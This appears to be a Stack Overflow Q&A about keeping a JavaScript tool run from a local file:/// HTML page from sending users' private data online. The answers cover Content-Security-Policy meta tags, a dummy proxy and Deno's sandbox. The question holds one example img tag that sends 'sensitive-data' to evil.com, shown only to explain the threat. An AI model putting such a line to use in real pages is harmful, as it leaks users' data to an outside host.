# How to prevent html in file:/// from accessing internet?

Tags: html, security, sandbox, same-origin-policy, isolation

The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded `<script>`, and that they'll just run this .html file in browser over `file:///` protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an `<img src="https://evil.com?sensitive-data=${XYZ}">` tag which would send a `GET` request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.

Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?

Comment: This is a catch-22. If you manage to find a way (I honestly think it's impossible), user's would need to take your word for it.

Comment: well, it could be the case that we live in a universe, where my word be something like "If you don't trust me, see this RFC/MDN/serious person, telling you it's true"

Comment: If your users are this paranoid that they themselves identify information leakages via the aforementioned vector a risk for them, they should be **taking steps themselves** to prevent such leakages from occurring that give them **affirmative assurance** that this exfiltration medium is not possible to leverage, independent of any assurances you might be able to provide. Short of that, they *will* need to trust your word that it does not misappropriate the data it’s processing.

Comment: For that, they'd need to audit the application source code so they can verify you comply with the RFC/MDN/serious person. If they have the time and energy to do so, they could just check the code itself, or set the browser to off-line mode.

Comment: Sorry Alvaro, I wasn't precise: I meant that they can verify that the browser/node/whatever "User Agent" they use to represent their interest conforms to the RFC/MDN and then they can safely execute the script in this. For example, imagaine a universe, not so different from ours, where a browser which opens file:///path.html can not access any other resource except for path.html because the RFC says so. (That's quite analogous to how we trust https certificates are verified by our browsers, or that browser hides input password from advertiser's js in iframe)

Comment: for another motivating example of such universe, consider deno (as alternative to node's [lack of] security model) where you can run a script in a sandbox, and this is allegedly the default https://www.codeleaks.io/deno-sandbox-and-its-security-flags/

Comment: nevermind, I've used Bash instead https://github.com/qbolec/23andme-bad-snips

Answer (score 1):

Please take a look at `Content-Security-Policy` subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src

Supplementing your html by `<meta http-equiv="Content-Security-Policy" content="img-src 'self';">` should disallow browser to make requests to foreign resources.

The alternative attempt could be developing your project in the form of a browser extension, where you can set up **content security policy** quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )

As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.

Comment: Looks like a promising direction. I've tried and indeed it has blocked loading of the `<img>` from a remote host, even after my javascript has removed the `<meta>` from the `<head>`. The practical problem then is how to "educate" and "persuade" the user that verifying the first few lines of html contain such `<meta>`s is sufficient. Thanks!

Comment: As the img-src directive only blocks images, someone could get around it by loading media, css etc. Replacing "img-src 'self';" with "default-src 'self'; form-action 'self';" would stop a lot more.

Answer (score 0):

Setting up browser proxy in settings to `localhost:DUMMY_PORT` looks like safe solution for this case.

Answer (score 0):

[Deno](https://deno.land/) is, to cite its website:

> Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
>
> - Secure by default. No file, network, or environment access, unless explicitly enabled.

So, this reduces the trust of the user to the trust in `deno` (and to chocolatey if they want to use `choco install deno` to install deno).